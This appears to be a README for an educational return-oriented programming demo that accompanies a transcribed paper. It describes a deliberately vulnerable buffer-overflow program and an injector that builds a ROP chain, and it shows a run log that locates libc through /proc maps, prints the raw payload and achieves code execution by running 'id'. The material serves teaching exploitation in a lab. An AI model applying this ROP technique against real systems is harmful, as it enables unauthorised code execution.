Original paper from Benjamin Randazzo [email protected] with source code transcripted for convenience.
There are also two test programs:
vuln
: a simple buffer overflow compiled withoutpie
injecter
: a program that inject aROP
payload that executes theid
command
Usage:
$./injecter ./vuln
[+] just forked pid 7887
[+] forked './vuln'
[>] Please enter your code:
[press RETURN key to continue] if you want to debug the injection attach it from gdb
cmd: cat /proc/7887/maps | grep '/lib/i386-linux-gnu/i686/cmov/libc-2.19.so' | grep r-xp | cut --field=1 --delimiter='-'
[+] libc base address: 0xf7526000
[+] libc .data address: 0xf76cd040
[<] AAAAAAAAAAAAAAAAAAAAAAAADCBA�7a�����/usr@�l�_;U��7a�����/binD�l�_;U��7a�����//idH�l�_;U��7a���������L�l� ^i�_;U�,�R�,�R�,�R�,�R�,�R�,�R�,�R�,�R�_;U��7a�����@�l�P�l�_;U��7a�T�l�P�l�����LOU�,�R�,�R�,�R�,�R�,�R�,�R�,�R�,�R�,�R�,�R�,�R���S�@�l��EU�
[>] uid=1000(packz) gid=1000(packz)
It's also possible to create an environment with
$ sudo docker build --tag=smash-the-stack .
$ sudo docker run -i -t smash-the-stack /bin/bash